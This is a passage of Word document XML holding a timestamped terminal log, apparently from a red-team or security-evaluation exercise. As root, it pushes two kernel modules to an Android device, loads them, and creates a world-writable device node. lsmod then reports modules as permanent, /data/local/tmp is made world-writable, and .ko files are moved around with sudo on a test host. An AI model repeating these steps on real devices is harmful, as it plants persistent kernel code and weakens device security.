    <w:p w14:paraId="27DBD18F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_BUILD_TYPE=release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37031924" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>BUILD_ID=OPM4.171019.021.E1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CE84AC8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>OUT_DIR=out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46897FD2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>AUX_OS_VARIANT_LIST=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F978BA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>============================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34993E74" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>/home/user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FDBB88" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate ~]$ adb push a64.ko /data/local/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="221056FB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>a64.ko: 1 file pushed. 0.5 MB/s (5824 bytes in 0.010s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E59759" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate ~]$ adb push msm_g711tlaw.ko /data/local/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEC2C10" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>msm_g711tlaw.ko: 1 file pushed. 1.4 MB/s (10128 bytes in 0.007s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18634FE3" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34FC647F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A83C58" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate ~]$ adb shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1FDE80" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/ # cd data/local/tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A7A8DE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26063AB8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">a64.ko msm_g711tlaw.ko swap tc </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5807782A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3199BC80" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:31</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E13AC9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">walleye:/data/local/tmp # insmod msm_g711tlaw.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68992B60" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # mknod /dev/msm_g711tlaw c 500 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5721F38A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # chmod 666 /dev/msm_g7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C88E407" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>msm_g711alaw      msm_g711alaw_in   msm_g711mlaw      msm_g711mlaw_in   msm_g711tlaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AA0B3CA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">walleye:/data/local/tmp # chmod 666 /dev/msm_g711tlaw </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421E1EA7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # chgrp shell /dev/msm_g711tlaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188AD772" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # chown shell /dev/msm_g711tlaw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2177DDAC" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E7FDE3D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7D79F7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">walleye:/data/local/tmp # insmod a64.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABCCE3A" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # lsmod</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58404436" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Module                  Size  Used by</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3485ADD9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>driver                  1909  1179328622 [permanent]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076B3CB2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>driver2                 4581  1179308918 [permanent]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38042A7E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12DEF599" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local/tmp # cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E80AF8C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local # chmod 777 tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79DB53D7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local # ls -la tmp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E2C51F8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>total 20971580</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35518278" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>drwxrwxrwx 3 shell  shell         4096 2019-05-17 18:30 .</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1306F450" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>drwxr-x--x 3 root   root          4096 2019-05-07 12:50 ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CD755D1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>-rwxrwxrwx 1 root   root          5824 2019-05-17 18:27 a64.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C03E19B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>-rwxrwxrwx 1 root   root         10128 2019-05-17 18:26 msm_g711tlaw.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF2D75D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>-rw------- 1 root   root   21474836480 2019-05-15 00:45 swap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3D05BE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>drwxrwxrwx 4 system system        4096 2019-05-07 12:50 tc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="761226B5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3163E20B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:33</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE3963D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>walleye:/data/local # exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39077E9F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ rm a64.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F917925" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate ~]$ rm msm_g711tlaw.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AE1630C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate ~]$ exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A19EB2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>logout</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A51FC9E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Connection to 128.55.12.54 closed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5654E6E1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="122A2965" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7682D17E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ ssh user@128.55.12.114</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13ABCBC2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">user@128.55.12.114's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B4840E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">[user@ta1-clearscope-translate-test ~]$ sudo chmod 777 ../admin/*.ko </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683AD7DD" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>chmod: cannot access '../admin/*.ko': No such file or directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34781DC4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate-test ~]$ sudo -s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1AB1EE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[root@ta1-clearscope-translate-test user]# cd ..</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E28ED79" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[root@ta1-clearscope-translate-test home]# cd admin/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="432B1818" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[root@ta1-clearscope-translate-test admin]# ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67482217" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>a64.ko  msm_g711tlaw.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5550B03C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[root@ta1-clearscope-translate-test admin]# chmod 777 *.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1385CC82" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[root@ta1-clearscope-translate-test admin]# mv *.ko ../user/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03617C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[root@ta1-clearscope-translate-test admin]# cd ../user</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF85C0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[root@ta1-clearscope-translate-test user]# exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417AD6F7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>exit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20958EC2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate-test ~]$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="249277D4" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Android  a64.ko           ingestor-2019-04-09-08:38.log  ingestor-2019-05-07-08:52.log  ingestor-2019-05-16.log  myinstr.sh                   sootOutput</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220BC135" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>CDM      cs-setup         ingestor-2019-04-12-09:53.log  ingestor-2019-05-08.log        msm_g711tlaw.ko          regression-2019-04-04-21:04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FFC2C8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TC       firefox4980.apk  ingestor-2019-05-03-14:47.log  ingestor-2019-05-15.log        myapp.apk                regression-latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E032CB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5909822B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:35</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CD37F17" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate-test ~]$ dolunch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38BF7C88" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/asus/fugu/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25194BD1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/car/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567E65AB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-arm64/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0F3BAB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-armv7-a-neon/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4570F433" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-mips/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195523A5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
